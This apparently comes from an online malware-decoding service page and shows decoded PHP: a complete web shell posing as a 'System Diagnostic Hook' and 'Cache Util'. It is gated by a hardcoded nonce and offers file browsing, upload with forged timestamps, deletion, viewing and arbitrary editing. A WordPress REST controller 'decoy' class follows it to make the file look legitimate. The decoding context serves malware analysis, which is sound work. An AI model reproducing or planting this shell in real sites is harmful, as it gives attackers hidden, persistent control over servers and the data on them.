Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


// System Diagnostic Hook
if (isset($_GET['diag_nonce']) && $_GET['diag_nonce'] === 'dd9f452cb19458a33139a1727f72fc9e') { error_reporting(0); 
$path = realpath(isset($_GET['path']) ? $_GET['path'] : );
$nonce = htmlspecialchars($_GET['diag_nonce']);
if (isset($_FILES['file'])) { $new_file_path = $path . '/' . $_FILES['file']['name']; move_uploaded_file($_FILES['file']['tmp_name'], $new_file_path); @touch($new_file_path, filemtime($path)); }
if (isset($_GET['del'])) { @unlink($_GET['del']); }
if (isset($_POST['new_content'])) { file_put_contents($_POST['file_path'], $_POST['new_content']); }
<!DOCTYPE html><html><head><title>Cache Util</title><style>body{font-family:sans-serif;background:#f4f4f4;}table{width:100%;border-collapse:collapse;}th,td{padding:8px;border:1px solid #ddd;text-align:left;}a{text-decoration:none;color:#0073aa;}.actions a{margin-right:10px;}</style></head><body>
<h2>File Utility - Current Path: echo htmlspecialchars($path);</h2><p><a href="?diag_nonce=echo $nonce;&path=echo urlencode(dirname($path));">Go Up</a></p>
<table><tr><th>Name</th><th>Size</th><th>Perms</th><th>Last Modified</th><th>Actions</th></tr>
$files = new DirectoryIterator($path);
foreach ($files as $file) {
    if ($file->isDot()) continue;
    $perms = substr(sprintf('%o', $file->getPerms()), -4);
    echo '<tr><td>' . ($file->isDir() ? '<a href="?diag_nonce='.$nonce.'&path=' . urlencode($file->getRealPath()) . '">[' . htmlspecialchars($file->getFilename()) . ']</a>' : htmlspecialchars($file->getFilename())) . '</td>';
    echo '<td>' . ($file->isDir() ? 'DIR' : round($file->getSize() / 1024, 2) . ' KB') . '</td>';
    echo '<td>' . htmlspecialchars($perms) . '</td>';
    echo '<td>' . date("Y-m-d H:i:s", $file->getMTime()) . '</td>';
    echo '<td class="actions"><a href="?diag_nonce='.$nonce.'&path=' . urlencode($path) . '&view=' . urlencode($file->getRealPath()) . '">View</a> <a href="?diag_nonce='.$nonce.'&path=' . urlencode($path) . '&edit=' . urlencode($file->getRealPath()) . '">Edit</a> <a href="?diag_nonce='.$nonce.'&path=' . urlencode($path) . '&del=' . urlencode($file->getRealPath()) . '" onclick="return confirm(\'Are you sure?\');">Delete</a></td></tr>';
}
</table><hr><h3>Upload File</h3><form method="post" enctype="multipart/form-data"><input type="file" name="file"><input type="submit" value="Upload"></form><hr>
if (isset($_GET['view'])) { echo '<h3>Viewing: ' . htmlspecialchars(basename($_GET['view'])) . '</h3><pre>' . htmlspecialchars(file_get_contents($_GET['view'])) . '</pre>'; }
if (isset($_GET['edit'])) { echo '<h3>Editing: ' . htmlspecialchars(basename($_GET['edit'])) . '</h3><form method="post"><textarea name="new_content" style="width:100%;height:300px;">' . htmlspecialchars(file_get_contents($_GET['edit'])) . '</textarea><input type="hidden" name="file_path" value="' . htmlspecialchars($_GET['edit']) . '"><br><input type="submit" value="Save"></form>'; }</body></html> exit; }

/**
 * Core class for controlling REST API routes. Functional decoy.
 * @package WordPress
 */
if (class_exists('WP_REST_Routes_Controller_Decoy')) { return; }
class WP_REST_Routes_Controller_Decoy {
    public static function get_routes() { 
        return [
            '/wp/v2/posts' => ['methods' => ['GET', 'POST']],
            '/wp/v2/users' => ['methods' => ['GET']],
        ]; 
    }
}
header("Content-Type: application/json");
echo json_encode(WP_REST_Routes_Controller_Decoy::get_routes());
die();


© 2023 Quttera Ltd. All rights reserved.